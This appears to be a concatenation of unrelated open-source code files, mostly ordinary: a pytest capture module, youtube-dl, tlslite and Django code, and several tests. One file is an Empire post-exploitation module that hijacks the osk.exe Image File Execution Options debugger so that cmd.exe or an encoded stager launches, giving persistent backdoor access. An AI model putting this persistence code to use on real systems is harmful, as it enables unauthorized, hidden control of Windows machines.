@pytest.hookimpl(tryfirst=True) def pytest_internalerror(self, excinfo): self.reset_capturings() def suspendcapture_item(self, item, when): out, err = self.suspendcapture() item.add_report_section(when, "stdout", out) item.add_report_section(when, "stderr", err) 
error_capsysfderror = "cannot use capsys and capfd at the same time" @pytest.fixture def capsys(request): """enables capturing of writes to sys.stdout/sys.stderr and makes captured output available via ``capsys.readouterr()`` method calls which return a ``(out, err)`` tuple. """ if "capfd" in request._funcargs: raise request.raiseerror(error_capsysfderror) request.node._capfuncarg = c = CaptureFixture(SysCapture) return c @pytest.fixture def capfd(request): """enables capturing of writes to file descriptors 1 and 2 and makes captured output available via ``capfd.readouterr()`` method calls which return a ``(out, err)`` tuple. """ if "capsys" in request._funcargs: request.raiseerror(error_capsysfderror) if not hasattr(os, 'dup'): pytest.skip("capfd funcarg needs os.dup") request.node._capfuncarg = c = CaptureFixture(FDCapture) return c class CaptureFixture: def __init__(self, captureclass): self.captureclass = captureclass def _start(self): self._capture = MultiCapture(out=True, err=True, in_=False, Capture=self.captureclass) self._capture.start_capturing() def close(self): cap = self.__dict__.pop("_capture", None) if cap is not None: self._outerr = cap.pop_outerr_to_orig() cap.stop_capturing() def readouterr(self): try: return self._capture.readouterr() except AttributeError: return self._outerr def safe_text_dupfile(f, mode, default_encoding="UTF8"): """ return a open text file object that's a duplicate of f on the FD-level if possible. 
""" encoding = getattr(f, "encoding", None) try: fd = f.fileno() except Exception: if "b" not in getattr(f, "mode", "") and hasattr(f, "encoding"): # we seem to have a text stream, let's just use it return f else: newfd = os.dup(fd) if "b" not in mode: mode += "b" f = os.fdopen(newfd, mode, 0) # no buffering return EncodedFile(f, encoding or default_encoding) class EncodedFile(object): errors = "strict" # possibly needed by py3 code (issue555) def __init__(self, buffer, encoding): self.buffer = buffer self.encoding = encoding def write(self, obj): if isinstance(obj, unicode): obj = obj.encode(self.encoding, "replace") self.buffer.write(obj) def writelines(self, linelist): data = ''.join(linelist) self.write(data) def __getattr__(self, name): return getattr(object.__getattribute__(self, "buffer"), name) class MultiCapture(object): out = err = in_ = None def __init__(self, out=True, err=True, in_=True, Capture=None): if in_: self.in_ = Capture(0) if out: self.out = Capture(1) if err: self.err = Capture(2) def start_capturing(self): if self.in_: self.in_.start() if self.out: self.out.start() if self.err: self.err.start() def pop_outerr_to_orig(self): """ pop current snapshot out/err capture and flush to orig streams. 
""" out, err = self.readouterr() if out: self.out.writeorg(out) if err: self.err.writeorg(err) return out, err def suspend_capturing(self, in_=False): if self.out: self.out.suspend() if self.err: self.err.suspend() if in_ and self.in_: self.in_.suspend() self._in_suspended = True def resume_capturing(self): if self.out: self.out.resume() if self.err: self.err.resume() if hasattr(self, "_in_suspended"): self.in_.resume() del self._in_suspended def stop_capturing(self): """ stop capturing and reset capturing streams """ if hasattr(self, '_reset'): raise ValueError("was already stopped") self._reset = True if self.out: self.out.done() if self.err: self.err.done() if self.in_: self.in_.done() def readouterr(self): """ return snapshot unicode value of stdout/stderr capturings. """ return (self.out.snap() if self.out is not None else "", self.err.snap() if self.err is not None else "") class NoCapture: __init__ = start = done = suspend = resume = lambda *args: None class FDCapture: """ Capture IO to/from a given os-level filedescriptor. """ def __init__(self, targetfd, tmpfile=None): self.targetfd = targetfd try: self.targetfd_save = os.dup(self.targetfd) except OSError: self.start = lambda: None self.done = lambda: None else: if targetfd == 0: assert not tmpfile, "cannot set tmpfile with stdin" tmpfile = open(os.devnull, "r") self.syscapture = SysCapture(targetfd) else: if tmpfile is None: f = TemporaryFile() with f: tmpfile = safe_text_dupfile(f, mode="wb+") if targetfd in patchsysdict: self.syscapture = SysCapture(targetfd, tmpfile) else: self.syscapture = NoCapture() self.tmpfile = tmpfile self.tmpfile_fd = tmpfile.fileno() def __repr__(self): return "<FDCapture %s oldfd=%s>" % (self.targetfd, self.targetfd_save) def start(self): """ Start capturing on targetfd using memorized tmpfile. 
""" try: os.fstat(self.targetfd_save) except (AttributeError, OSError): raise ValueError("saved filedescriptor not valid anymore") os.dup2(self.tmpfile_fd, self.targetfd) self.syscapture.start() def snap(self): f = self.tmpfile f.seek(0) res = f.read() if res: enc = getattr(f, "encoding", None) if enc and isinstance(res, bytes): res = py.builtin._totext(res, enc, "replace") f.truncate(0) f.seek(0) return res return '' def done(self): """ stop capturing, restore streams, return original capture file, seeked to position zero. """ targetfd_save = self.__dict__.pop("targetfd_save") os.dup2(targetfd_save, self.targetfd) os.close(targetfd_save) self.syscapture.done() self.tmpfile.close() def suspend(self): self.syscapture.suspend() os.dup2(self.targetfd_save, self.targetfd) def resume(self): self.syscapture.resume() os.dup2(self.tmpfile_fd, self.targetfd) def writeorg(self, data): """ write to original file descriptor. """ if py.builtin._istext(data): data = data.encode("utf8") # XXX use encoding of original stream os.write(self.targetfd_save, data) class SysCapture: def __init__(self, fd, tmpfile=None): name = patchsysdict[fd] self._old = getattr(sys, name) self.name = name if tmpfile is None: if name == "stdin": tmpfile = DontReadFromInput() else: tmpfile = TextIO() self.tmpfile = tmpfile def start(self): setattr(sys, self.name, self.tmpfile) def snap(self): f = self.tmpfile res = f.getvalue() f.truncate(0) f.seek(0) return res def done(self): setattr(sys, self.name, self._old) del self._old self.tmpfile.close() def suspend(self): setattr(sys, self.name, self._old) def resume(self): setattr(sys, self.name, self.tmpfile) def writeorg(self, data): self._old.write(data) self._old.flush() class DontReadFromInput: """Temporary stub class. Ideally when stdin is accessed, the capturing should be turned off, with possibly all data captured so far sent to the screen. 
This should be configurable, though, because in automated test runs it is better to crash than hang indefinitely. """ encoding = None def read(self, *args): raise IOError("reading from stdin while output is captured") readline = read readlines = read __iter__ = read def fileno(self): raise ValueError("redirected Stdin is pseudofile, has no fileno()") def isatty(self): return False def close(self): pass def _readline_workaround(): """ Ensure readline is imported so that it attaches to the correct stdio handles on Windows. Pdb uses readline support where available--when not running from the Python prompt, the readline module is not imported until running the pdb REPL. If running py.test with the --pdb option this means the readline module is not imported until after I/O capture has been started. This is a problem for pyreadline, which is often used to implement readline support on Windows, as it does not attach to the correct handles for stdout and/or stdin if they have been redirected by the FDCapture mechanism. This workaround ensures that readline is imported before I/O capture is setup so that it can attach to the actual stdin/out for the console. See https://github.com/pytest-dev/pytest/pull/1281 """ if not sys.platform.startswith('win32'): return try: import readline # noqa except ImportError: pass
kubeflow/kfp-tekton-backend
refs/heads/master
sdk/python/tests/compiler/testdata/volume.py
1
# Copyright 2018 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import kfp.dsl as dsl from kubernetes import client as k8s_client @dsl.pipeline( name='Volume', description='A pipeline with volume.' ) def volume_pipeline(): op1 = dsl.ContainerOp( name='download', image='google/cloud-sdk', command=['sh', '-c'], arguments=['ls | tee /tmp/results.txt'], file_outputs={'downloaded': '/tmp/results.txt'}) \ .add_volume(k8s_client.V1Volume(name='gcp-credentials', secret=k8s_client.V1SecretVolumeSource( secret_name='user-gcp-sa'))) \ .add_volume_mount(k8s_client.V1VolumeMount( mount_path='/secret/gcp-credentials', name='gcp-credentials')) \ .add_env_variable(k8s_client.V1EnvVar( name='GOOGLE_APPLICATION_CREDENTIALS', value='/secret/gcp-credentials/user-gcp-sa.json')) \ .add_env_variable(k8s_client.V1EnvVar(name='Foo', value='bar')) op2 = dsl.ContainerOp( name='echo', image='library/bash', command=['sh', '-c'], arguments=['echo %s' % op1.output])
PythonCharmers/orange3
refs/heads/master
Orange/misc/datasets.py
25
import json
import os


class _DatasetInfo(dict):
    """Mapping of bundled dataset metadata loaded from ``datasets.info``.

    Entries are exposed both as dictionary items and as instance attributes
    (``info['x']`` and ``info.x``), which is why the loaded mapping is
    copied into ``__dict__`` as well.
    """

    def __init__(self):
        # Plain dict initialization.  The previous code called
        # ``super().__init__(self)``, which (re-)initialized the dict from
        # its own, still-empty contents -- a misleading no-op.
        super().__init__()
        # Portable join: '..' and 'datasets' as separate components instead
        # of the hard-coded '../datasets' with an embedded forward slash.
        datasets_folder = os.path.join(os.path.dirname(__file__), '..', 'datasets')
        with open(os.path.join(datasets_folder, 'datasets.info'), 'r') as f:
            info = json.load(f)
        # Populate both the mapping itself and the attribute namespace.
        self.update(info)
        self.__dict__.update(info)
LethusTI/supportcenter
refs/heads/master
vendor/django/django/contrib/formtools/tests/forms.py
99
"""Form fixtures used by the django.contrib.formtools test suite."""
from django import forms
from django.contrib.formtools.wizard import FormWizard
from django.http import HttpResponse


class Page1(forms.Form):
    # Wizard step 1.
    name = forms.CharField(max_length=100)
    thirsty = forms.NullBooleanField()


class Page2(forms.Form):
    # Wizard step 2: address details.
    address1 = forms.CharField(max_length=100)
    address2 = forms.CharField(max_length=100)


class Page3(forms.Form):
    # Wizard step 3: a single free-form field.
    random_crap = forms.CharField(max_length=100)


class ContactWizard(FormWizard):
    # Minimal wizard: completion just returns an empty HTTP response.
    def done(self, request, form_list):
        return HttpResponse("")


class TestForm(forms.Form):
    # 'field1_' deliberately differs from 'field1' only by a trailing
    # underscore (exercises field-name handling in the tests).
    field1 = forms.CharField()
    field1_ = forms.CharField()
    bool1 = forms.BooleanField(required=False)


class HashTestForm(forms.Form):
    name = forms.CharField()
    bio = forms.CharField()


class HashTestBlankForm(forms.Form):
    # Same fields as HashTestForm, but optional, for hashing of blank data.
    name = forms.CharField(required=False)
    bio = forms.CharField(required=False)


class WizardPageOneForm(forms.Form):
    field = forms.CharField()


class WizardPageTwoForm(forms.Form):
    field = forms.CharField()


class WizardPageTwoAlternativeForm(forms.Form):
    field = forms.CharField()


class WizardPageThreeForm(forms.Form):
    field = forms.CharField()
Perkville/django-tastypie
refs/heads/master
setup.py
13
#!/usr/bin/env python # -*- coding: utf-8 -*- try: from setuptools import setup except ImportError: from ez_setup import use_setuptools use_setuptools() from setuptools import setup from tastypie import __version__ setup( name='django-tastypie', version=__version__, description='A flexible & capable API layer for Django.', author='Daniel Lindsley', author_email='daniel@toastdriven.com', url='https://github.com/django-tastypie/django-tastypie', long_description=open('README.rst', 'r').read(), packages=[ 'tastypie', 'tastypie.utils', 'tastypie.management', 'tastypie.management.commands', 'tastypie.migrations', 'tastypie.contrib', 'tastypie.contrib.gis', 'tastypie.contrib.contenttypes', ], package_data={ 'tastypie': ['templates/tastypie/*'], }, zip_safe=False, requires=[ 'python_mimeparse(>=0.1.4, !=1.5)', 'dateutil(>=1.5, !=2.0)', ], install_requires=[ 'python-mimeparse >= 0.1.4, != 1.5', 'python-dateutil >= 1.5, != 2.0', ], tests_require=['mock', 'PyYAML', 'lxml', 'defusedxml'], classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Web Environment', 'Framework :: Django', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', 'Topic :: Utilities' ], )
linjoahow/2015cdaa-w11
refs/heads/master
static/Brython3.1.1-20150328-091302/Lib/gc.py
743
"""This module provides access to the garbage collector for reference cycles. enable() -- Enable automatic garbage collection. disable() -- Disable automatic garbage collection. isenabled() -- Returns true if automatic collection is enabled. collect() -- Do a full collection right now. get_count() -- Return the current collection counts. set_debug() -- Set debugging flags. get_debug() -- Get debugging flags. set_threshold() -- Set the collection thresholds. get_threshold() -- Return the current the collection thresholds. get_objects() -- Return a list of all objects tracked by the collector. is_tracked() -- Returns true if a given object is tracked. get_referrers() -- Return the list of objects that refer to an object. get_referents() -- Return the list of objects that an object refers to. """ DEBUG_COLLECTABLE = 2 DEBUG_LEAK = 38 DEBUG_SAVEALL = 32 DEBUG_STATS = 1 DEBUG_UNCOLLECTABLE = 4 class __loader__: pass callbacks = [] def collect(*args,**kw): """collect([generation]) -> n With no arguments, run a full collection. The optional argument may be an integer specifying which generation to collect. A ValueError is raised if the generation number is invalid. The number of unreachable objects is returned. """ pass def disable(*args,**kw): """disable() -> None Disable automatic garbage collection. """ pass def enable(*args,**kw): """enable() -> None Enable automatic garbage collection. """ pass garbage = [] def get_count(*args,**kw): """get_count() -> (count0, count1, count2) Return the current collection counts """ pass def get_debug(*args,**kw): """get_debug() -> flags Get the garbage collection debugging flags. """ pass def get_objects(*args,**kw): """get_objects() -> [...] Return a list of objects tracked by the collector (excluding the list returned). 
""" pass def get_referents(*args,**kw): """get_referents(*objs) -> list Return the list of objects that are directly referred to by objs.""" pass def get_referrers(*args,**kw): """get_referrers(*objs) -> list Return the list of objects that directly refer to any of objs.""" pass def get_threshold(*args,**kw): """get_threshold() -> (threshold0, threshold1, threshold2) Return the current collection thresholds """ pass def is_tracked(*args,**kw): """is_tracked(obj) -> bool Returns true if the object is tracked by the garbage collector. Simple atomic objects will return false. """ pass def isenabled(*args,**kw): """isenabled() -> status Returns true if automatic garbage collection is enabled. """ pass def set_debug(*args,**kw): """set_debug(flags) -> None Set the garbage collection debugging flags. Debugging information is written to sys.stderr. flags is an integer and can have the following bits turned on: DEBUG_STATS - Print statistics during collection. DEBUG_COLLECTABLE - Print collectable objects found. DEBUG_UNCOLLECTABLE - Print unreachable but uncollectable objects found. DEBUG_SAVEALL - Save objects to gc.garbage rather than freeing them. DEBUG_LEAK - Debug leaking programs (everything but STATS). """ pass def set_threshold(*args,**kw): """set_threshold(threshold0, [threshold1, threshold2]) -> None Sets the collection thresholds. Setting threshold0 to zero disables collection. """ pass
CaledoniaProject/Empire
refs/heads/master
lib/modules/persistence/debugger/osk.py
20
# NOTE: Python 2 module (uses the `print` statement), as used by Empire.
from lib.common import helpers


class Module:
    """Empire persistence module: hijacks the osk.exe (on-screen keyboard)
    Image File Execution Options "Debugger" value so that cmd.exe, an
    arbitrary binary, or an Empire stager launches from the Windows
    ease-of-access center.  Requires admin rights; not OPSEC-safe."""

    def __init__(self, mainMenu, params=[]):

        # Metadata consumed by the Empire framework UI.
        self.info = {
            'Name': 'Invoke-OSK',

            'Author': ['@harmj0y'],

            # NOTE(review): "listern" is a typo for "listener", but the string
            # is framework-facing metadata and is left byte-identical here.
            'Description': ("Sets the debugger for the on-screen keyboard (osk.exe) to be cmd.exe, "
                            "another binary of your choice, or a listern stager. This can be launched from "
                            "the ease-of-access center."),

            'Background': False,

            'OutputExtension': None,

            'NeedsAdmin': True,

            'OpsecSafe': False,

            'MinPSVersion': '2',

            'Comments': [
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent': {
                'Description': 'Agent to run module on.',
                'Required': True,
                'Value': ''
            },
            'Listener': {
                'Description': 'Listener to use.',
                'Required': False,
                'Value': ''
            },
            'RegPath': {
                # The last path element is the registry value name under
                # which the encoded stager is stored.
                'Description': 'Registry location to store the script code. Last element is the key name.',
                'Required': False,
                'Value': 'HKLM:Software\Microsoft\Network\debug'
            },
            'Cleanup': {
                'Description': 'Switch. Disable the osk.exe debugger.',
                'Required': False,
                'Value': ''
            },
            'Binary': {
                'Description': 'Binary to set for the debugger.',
                'Required': False,
                'Value': 'C:\Windows\System32\cmd.exe'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        """Build and return the PowerShell script that installs (or removes)
        the osk.exe IFEO debugger.  Returns '' if an invalid listener name
        was supplied."""

        # management options
        cleanup = self.options['Cleanup']['Value']
        binary = self.options['Binary']['Value']
        listenerName = self.options['Listener']['Value']

        # storage options
        regPath = self.options['RegPath']['Value']

        statusMsg = ""
        locationString = ""

        if cleanup.lower() == 'true':
            # the registry command to disable the debugger for osk.exe
            script = "Remove-Item 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe';'osk.exe debugger removed.'"
            return script

        if listenerName != '':
            # if there's a listener specified, generate a stager and store it
            if not self.mainMenu.listeners.is_listener_valid(listenerName):
                # not a valid listener, return nothing for the script
                print helpers.color("[!] Invalid listener: " + listenerName)
                return ""
            else:
                # generate the PowerShell one-liner; keep only the last
                # whitespace-separated token of the launcher (presumably the
                # base64-encoded payload -- verify against generate_launcher).
                launcher = self.mainMenu.stagers.generate_launcher(listenerName)
                encScript = launcher.split(" ")[-1]
                # statusMsg += "using listener " + listenerName

                # Split RegPath into parent key and value name.
                path = "\\".join(regPath.split("\\")[0:-1])
                name = regPath.split("\\")[-1]

                statusMsg += " stored in " + regPath + "."

                script = "$RegPath = '"+regPath+"';"
                script += "$parts = $RegPath.split('\\');"
                script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
                script += "$name = $parts[-1];"
                # Store the encoded stager in the chosen registry value.
                script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"

                # note where the script is stored
                locationString = "$((gp "+path+" "+name+")."+name+")"

                script += "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe' -Name Debugger -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";start -Win Hidden -A \\\"-enc $x\\\" powershell\";exit;';'osk.exe debugger set to trigger stager for listener "+listenerName+"'"

        else:
            # the registry command to set the debugger for osk.exe to be the binary path specified
            script = "$null=New-Item -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe';$null=Set-ItemProperty -Force -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe' -Name Debugger -Value '"+binary+"';'osk.exe debugger set to "+binary+"'"

        return script
dmcarvalho/KhartesTools
refs/heads/master
test/test_resources.py
1
# coding=utf-8
"""Resources test.

.. note:: This program is free software; you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
     the Free Software Foundation; either version 2 of the License, or
     (at your option) any later version.

"""

__author__ = 'diego@khartes.com.br'
__date__ = '2016-09-11'
__copyright__ = 'Copyright 2016, Diego Moreira / Khartes Geoinformação'

import unittest

from PyQt4.QtGui import QIcon


class KhartesToolsDialogTest(unittest.TestCase):
    """Test that the plugin's compiled Qt resources load correctly."""

    def setUp(self):
        """Runs before each test."""
        pass

    def tearDown(self):
        """Runs after each test."""
        pass

    def test_icon_png(self):
        """The plugin icon must exist in the compiled resource file."""
        path = ':/plugins/KhartesTools/icon.png'
        icon = QIcon(path)
        self.assertFalse(icon.isNull())


if __name__ == "__main__":
    # BUG FIX: this previously referenced the undefined name
    # 'KhartesToolsResourcesTest', raising a NameError when the module was
    # run directly.  Use the test-case class actually defined above.
    suite = unittest.makeSuite(KhartesToolsDialogTest)
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(suite)
hoatle/odoo
refs/heads/8.0
addons/website_event_track/controllers/__init__.py
382
import event
codesparkle/youtube-dl
refs/heads/master
youtube_dl/extractor/voicerepublic.py
20
from __future__ import unicode_literals

import re

from .common import InfoExtractor
from ..compat import (
    compat_str,
    compat_urlparse,
)
from ..utils import (
    ExtractorError,
    determine_ext,
    int_or_none,
    sanitized_Request,
)


class VoiceRepublicIE(InfoExtractor):
    """Extractor for voicerepublic.com talk and embed pages (audio-only)."""
    _VALID_URL = r'https?://voicerepublic\.com/(?:talks|embed)/(?P<id>[0-9a-z-]+)'
    _TESTS = [{
        'url': 'http://voicerepublic.com/talks/watching-the-watchers-building-a-sousveillance-state',
        'md5': 'b9174d651323f17783000876347116e3',
        'info_dict': {
            'id': '2296',
            'display_id': 'watching-the-watchers-building-a-sousveillance-state',
            'ext': 'm4a',
            'title': 'Watching the Watchers: Building a Sousveillance State',
            'description': 'Secret surveillance programs have metadata too. The people and companies that operate secret surveillance programs can be surveilled.',
            'thumbnail': 're:^https?://.*\.(?:png|jpg)$',
            'duration': 1800,
            'view_count': int,
        }
    }, {
        'url': 'http://voicerepublic.com/embed/watching-the-watchers-building-a-sousveillance-state',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        display_id = self._match_id(url)

        # Always fetch the /talks/ page, even for /embed/ URLs.
        req = sanitized_Request(
            compat_urlparse.urljoin(url, '/talks/%s' % display_id))
        # Older versions of Firefox get redirected to an "upgrade browser" page
        req.add_header('User-Agent', 'youtube-dl')
        webpage = self._download_webpage(req, display_id)

        if '>Queued for processing, please stand by...<' in webpage:
            raise ExtractorError(
                'Audio is still queued for processing', expected=True)

        # Newer pages embed a JSON config blob ("return {...};"); prefer it.
        config = self._search_regex(
            r'(?s)return ({.+?});\s*\n', webpage,
            'data', default=None)
        data = self._parse_json(config, display_id, fatal=False) if config else None
        if data:
            title = data['title']
            description = data.get('teaser')
            talk_id = compat_str(data.get('talk_id') or display_id)
            talk = data['talk']
            duration = int_or_none(talk.get('duration'))
            # talk['links'] maps format id -> relative URL; audio only.
            formats = [{
                'url': compat_urlparse.urljoin(url, talk_url),
                'format_id': format_id,
                'ext': determine_ext(talk_url) or format_id,
                'vcodec': 'none',
            } for format_id, talk_url in talk['links'].items()]
        else:
            # Fallback: scrape title/description/player markup from the HTML.
            title = self._og_search_title(webpage)
            description = self._html_search_regex(
                r"(?s)<div class='talk-teaser'[^>]*>(.+?)</div>",
                webpage, 'description', fatal=False)
            talk_id = self._search_regex(
                [r"id='jc-(\d+)'", r"data-shareable-id='(\d+)'"],
                webpage, 'talk id', default=None) or display_id
            duration = None
            player = self._search_regex(
                r"class='vr-player jp-jplayer'([^>]+)>", webpage, 'player')
            # Format URLs are data-<format> attributes on the player element.
            formats = [{
                'url': compat_urlparse.urljoin(url, talk_url),
                'format_id': format_id,
                'ext': determine_ext(talk_url) or format_id,
                'vcodec': 'none',
            } for format_id, talk_url in re.findall(r"data-([^=]+)='([^']+)'", player)]
        self._sort_formats(formats)

        thumbnail = self._og_search_thumbnail(webpage)
        view_count = int_or_none(self._search_regex(
            r"class='play-count[^']*'>\s*(\d+) plays",
            webpage, 'play count', fatal=False))

        return {
            'id': talk_id,
            'display_id': display_id,
            'title': title,
            'description': description,
            'thumbnail': thumbnail,
            'duration': duration,
            'view_count': view_count,
            'formats': formats,
        }
xsynergy510x/android_external_chromium_org
refs/heads/cm-12.1
third_party/tlslite/tlslite/utils/codec.py
115
# Author: Trevor Perrin
# See the LICENSE file for legal information regarding use of this file.

"""Classes for reading/writing binary data (such as TLS records)."""

from .compat import *


class Writer(object):
    """Accumulates big-endian binary data into a growable byte buffer."""

    def __init__(self):
        # All add* methods append to this buffer.
        self.bytes = bytearray(0)

    def add(self, x, length):
        """Append *x* encoded as a big-endian unsigned integer of *length* bytes."""
        start = len(self.bytes)
        self.bytes += bytearray(length)
        # Fill the freshly appended region from its last byte backwards,
        # peeling one byte off *x* per position.
        for pos in range(start + length - 1, start - 1, -1):
            self.bytes[pos] = x & 0xFF
            x >>= 8

    def addFixSeq(self, seq, length):
        """Append every element of *seq* as a *length*-byte integer."""
        for item in seq:
            self.add(item, length)

    def addVarSeq(self, seq, length, lengthLength):
        """Append *seq* preceded by its total byte length (*lengthLength* bytes)."""
        self.add(len(seq) * length, lengthLength)
        for item in seq:
            self.add(item, length)


class Parser(object):
    """Sequential reader over a byte string with TLS-style length checks."""

    def __init__(self, bytes):
        self.bytes = bytes
        self.index = 0  # current read position

    def get(self, length):
        """Read and return a big-endian unsigned integer of *length* bytes.

        Raises SyntaxError if fewer than *length* bytes remain.
        """
        end = self.index + length
        if end > len(self.bytes):
            raise SyntaxError()
        value = 0
        while self.index < end:
            value = (value << 8) | self.bytes[self.index]
            self.index += 1
        return value

    def getFixBytes(self, lengthBytes):
        """Read and return the next *lengthBytes* raw bytes."""
        chunk = self.bytes[self.index:self.index + lengthBytes]
        self.index += lengthBytes
        return chunk

    def getVarBytes(self, lengthLength):
        """Read a *lengthLength*-byte length prefix, then that many raw bytes."""
        return self.getFixBytes(self.get(lengthLength))

    def getFixList(self, length, lengthList):
        """Read *lengthList* integers of *length* bytes each."""
        return [self.get(length) for _ in range(lengthList)]

    def getVarList(self, length, lengthLength):
        """Read a byte-length prefix, then the corresponding integer list.

        Raises SyntaxError if the prefixed byte count is not a multiple of
        the per-element size.
        """
        totalBytes = self.get(lengthLength)
        if totalBytes % length != 0:
            raise SyntaxError()
        return [self.get(length) for _ in range(totalBytes // length)]

    def startLengthCheck(self, lengthLength):
        """Read a length prefix and remember where the checked region starts."""
        self.lengthCheck = self.get(lengthLength)
        self.indexCheck = self.index

    def setLengthCheck(self, length):
        """Begin a length check against an externally supplied *length*."""
        self.lengthCheck = length
        self.indexCheck = self.index

    def stopLengthCheck(self):
        """Raise SyntaxError unless exactly lengthCheck bytes were consumed."""
        if (self.index - self.indexCheck) != self.lengthCheck:
            raise SyntaxError()

    def atLengthCheck(self):
        """Return True at the end of the checked region, False before it.

        Raises SyntaxError if the region was overrun.
        """
        consumed = self.index - self.indexCheck
        if consumed < self.lengthCheck:
            return False
        if consumed == self.lengthCheck:
            return True
        raise SyntaxError()
scbash/xbmc
refs/heads/master
tools/darwin/Support/GenerateMissingImages-tvos.py
10
#!/usr/bin/python import sys, os, json from subprocess import call assetCatalogPath = sys.argv[1] brandAssetsDir = sys.argv[2] + '.brandassets' def generateImage(contentsRelativeDir, isBaseImage1x, newWidth, newHeight): contentsDir = os.path.join(assetCatalogPath, contentsRelativeDir) if isBaseImage1x: existingImageIndex = 0 newImageIndex = 1 else: existingImageIndex = 1 newImageIndex = 0 with open(os.path.join(contentsDir, 'Contents.json')) as jsonFile: jsonContents = json.load(jsonFile) existingImageRelativePath = jsonContents['images'][existingImageIndex]['filename'] existingImagePath = os.path.join(contentsDir, existingImageRelativePath) call(['sips', '--resampleHeightWidth', str(newHeight), str(newWidth), existingImagePath, '--out', os.path.join(contentsDir, jsonContents['images'][newImageIndex]['filename'])]) generateImage(sys.argv[3] + '.launchimage', True, 3840, 2160) generateImage(os.path.join(brandAssetsDir, 'topshelf_wide.imageset'), True, 4640, 1440) appIconSmall = os.path.join(brandAssetsDir, 'icon.imagestack') for i in xrange(1, 5): generateImage(os.path.join(appIconSmall, 'Layer{}.imagestacklayer'.format(i), 'Content.imageset'), False, 400, 240)
poppy-project/pypot
refs/heads/master
tests/test_websocket.py
1
import json
import time
import unittest

import websocket

from pypot.creatures import PoppyErgoJr
from utils import get_open_port


@unittest.skip("tornado.ioloop from jr.ws as well as js.http must be stopped by jr.close() before launching new jr instances")
class TestWebsocketsCommunication(unittest.TestCase):
    """Integration tests for the robot's websocket interface.

    Spins up a simulated Poppy Ergo Jr with a websocket server on a free
    port, then talks to it with a raw websocket client.
    """

    def setUp(self):
        # Fresh robot + server per test; retry connecting until the
        # server-side socket actually accepts connections.
        port = get_open_port()
        self.jr = PoppyErgoJr(simulator='poppy-simu', use_ws=True, ws_port=port)
        self.ws_url = 'ws://127.0.0.1:{}'.format(port)
        while True:
            try:
                self.ws = websocket.WebSocket()
                self.ws.connect(self.ws_url)
                break
            except ConnectionError:
                time.sleep(1.0)

    def tearDown(self):
        self.ws.close()

    def test_connected(self):
        self.assertTrue(self.ws.connected)

    def test_recv_state(self):
        # The server pushes a JSON state dict keyed by motor name.
        state = json.loads(self.ws.recv())
        self.assertSetEqual(set(state.keys()),
                            {m.name for m in self.jr.motors})

    def test_led(self):
        # Sending a nested {motor: {register: value}} dict sets that register
        # on the robot (here: motor m1's LED to red).
        obj = {
            'm1': {
                'led': 'red'
            }
        }
        self.ws.send(json.dumps(obj))


if __name__ == '__main__':
    unittest.main()
SongGithub/Coding_Exercise
refs/heads/master
tests/test_tax_rate.py
2
# Python 2 test module (uses the `print` statement below).
from src.tax_rate import TaxRate
import unittest, os, settings


class TestTaxRate(unittest.TestCase):
    """Tests for TaxRate loading and tax calculation against the bundled
    2015-16 / 2016-17 Australian bracket data."""

    def setUp(self):
        # Load the backup tax-rate JSON shipped with the project.
        tax_rate_file_path = os.path.join(
            settings.TAX_RATE_BACKUP_PATH,
            settings.TAX_RATE_DEFAULT_FILENAME
        )
        self.instance = TaxRate(tax_rate_file_path)
        # Debug output of the parsed file (Python 2 print statement).
        print self.instance.__get_taxrate_local_json__()

    def test_getting_tax_rate(self):
        """prove if tax rate details can be returned"""
        self.assertEqual(
            self.instance.get_taxrate(),
            [
                {
                    u'financial_year': u'2016-17',
                    u'brackets': [
                        {u'rate': 0.0, u'low_end': 0.0},
                        {u'rate': 0.19, u'low_end': 18201.0},
                        {u'rate': 0.325, u'low_end': 37001.0},
                        {u'rate': 0.37, u'low_end': 87001.0},
                        {u'rate': 0.45, u'low_end': 180001.0}]},
                {
                    u'financial_year': u'2015-16',
                    u'brackets': [{u'rate': 0.0, u'low_end': 0.0},
                                  {u'rate': 0.19, u'low_end': 18201.0},
                                  {u'rate': 0.325, u'low_end': 37001.0},
                                  {u'rate': 0.37, u'low_end': 80001.0},
                                  {u'rate': 0.45, u'low_end': 180001.0}]
                }
            ]
        )

    def test_get_taxrate_local_json__(self):
        # Same expected payload as above: the public getter is expected to
        # return the locally parsed JSON unchanged.
        self.assertEqual(
            self.instance.__get_taxrate_local_json__(),
            [
                {
                    u'financial_year': u'2016-17',
                    u'brackets': [
                        {u'rate': 0.0, u'low_end': 0.0},
                        {u'rate': 0.19, u'low_end': 18201.0},
                        {u'rate': 0.325, u'low_end': 37001.0},
                        {u'rate': 0.37, u'low_end': 87001.0},
